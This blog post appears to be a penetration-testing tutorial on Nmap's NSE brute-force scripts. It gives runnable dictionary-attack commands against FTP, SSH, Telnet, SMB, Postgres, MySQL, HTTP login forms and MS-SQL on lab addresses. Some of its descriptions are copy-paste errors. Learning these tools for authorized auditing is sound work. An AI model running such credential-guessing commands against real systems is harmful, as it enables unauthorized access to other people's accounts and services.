Nmap for Pentester: Dictionary Attack

at 2:26 AM Sunday, August 15, 2021

We will process the showcase for Nmap Brute NSE Script for dictionary attack in this article since Nmap is such a large tool that it can't be covered in one post.

If you're wondering whether or not a brute-force assault using Nmap is doable.

Yes, Nmap includes an NSE-based script that can perform dictionary brute force attacks on secured services.

Table of Contents

·         FTP Brute Force

·         SSH Brute Force

·         Telnet Brute Force

·         SMB Brute Force

·         Pqsql Brute Force

·         HTTP-form-brute Brute Force

 

The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap.  The core of the Nmap Scripting Engine is an embeddable Lua interpreter. The second part of the Nmap Scripting Engine is the NSE Library, which connects Lua and Nmap.

 NSE scripts define a list of categories they belong to. Currently defined categories are auth, broadcast, brute, default. discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln.

But I mentioned above that in this we will demonstrating the Nmap Brute script. These scripts use brute force attacks to guess the authentication credentials of a remote server. Nmap contains scripts for brute-forcing dozens of protocols, including HTTP-brute, oracle-brute, SNMP-brute, etc.

To list all nse scripts for brute forces :

locate *.nse |grep Brute



Simply specify -sC to enable the most common scripts. Or specify the --script option to choose your scripts to execute by providing categories, script file names, or the name of directories full of scripts you wish to execute. You can customize some scripts by providing arguments to them via --script-args and --script-args-file options.

FTP Brute Force

Performs brute force password auditing against FTP servers. All we need are dictionaries for usernames and passwords, which will be passed as arguments.

 

nmap -p21 --script ftp-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150

 


SSH Brute Force

Performs brute-force password guessing against ssh servers and connection timeout (default: "5s"). All we need are dictionaries for usernames and passwords, which will be passed as arguments.

 

nmap -p22 --script ssh-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150



For valid username and password combination, it will dump the credential.



 

Telnet Brute Force

Performs brute-force password auditing against telnet servers and connection timeout (default: "5s"). All we need are dictionaries for usernames and passwords, which will be passed as arguments.

 

nmap -p23 --script telnet-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150



 

SMB Brute Force

Attempts to guess SMB username/password combinations, saving identified combinations for use in other scripts. Every effort will be made to get a genuine list of users and to validate each username before utilizing them. When a username is identified, it is not only displayed but also kept in the Nmap registry for future use by other Nmap scripts. 

 

All we need are dictionaries for usernames and passwords, which will be passed as arguments.

 

nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150



Postgres Brute Force

Performs brute-force password auditing against telnet servers and connection timeout (default: "5s"). All we need are dictionaries for usernames and passwords, which will be passed as arguments.

 

nmap -p5432 --script pgsql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150



 

Mysql Brute Force

Performs brute-force password auditing against Mysql servers and connection timeout (default: "5s"). All we need are dictionaries for usernames and passwords, which will be passed as arguments.

 

nmap -p3306 --script mysql-brute --script-args userdb=users.txt 192.168.1.150



 

HTTP Brute Force

Performs brute force password auditing against HTTP form-based authentication. This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored in the nmap registry, using the creds library, for other scripts to use.

 


nmap -p 80 --script=http-form-brute --script-args "userdb=users.txt,passdb=pass.txt,http-form-brute.path=/dvwa/login.php" 192.168.1.150

 


 

 

Ms-SQL Brute Force

Performs brute-force password auditing against Ms-SQL servers and connection timeout (default: "5s"). All we need are dictionaries for usernames and passwords, which will be passed as arguments.

  

nmap -p1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.146

 



Refence: https://nmap.org/book/nse-usage.html#nse-categories https://nmap.org/nsedoc/scripts/http-form-brute.html

 

Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)